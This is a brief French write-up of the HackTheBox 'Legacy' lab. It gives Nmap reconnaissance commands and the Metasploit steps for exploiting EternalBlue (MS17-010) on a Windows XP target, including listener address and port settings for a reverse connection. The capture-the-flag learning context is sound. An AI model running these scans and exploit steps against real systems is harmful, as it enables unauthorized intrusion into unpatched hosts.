Legacy HackTheBox (Writeup)

Skills:

SMB Enumeration
Eternalblue Exploitation (MS17-010) [Triple Z Exploit]

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.10.4 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (135,139,445)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p135,139,445 10.10.10.4 -oN targeted

Eternalblue Exploitation - SMB [MS17-010]

L'analyse Nmap nous indique que le serveur cible exécute une version de Windows XP, ce qui nous permet de tenter l'exploitation de la vulnérabilité MS17-010.

Nous lançons un scan Nmap pour vérifier la présence de cette vulnérabilité :

nmap --script "vuln and safe" -p445 10.10.10.4 -oN smbScan

Ce scan confirme que la machine est vulnérable à MS17-010.

Exploitation avec Metasploit

Nous recherchons l'exploit dans Metasploit :

msfconsole 
search eternalblue

Nous sélectionnons le premier exploit listé :

use 1

Nous configurons les options :

set RHOSTS 10.10.10.4
set LHOST 10.10.14.50
set LPORT 443

Puis, nous lançons l'exploit :

Flag user.txt :)

Flag root.txt :)

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?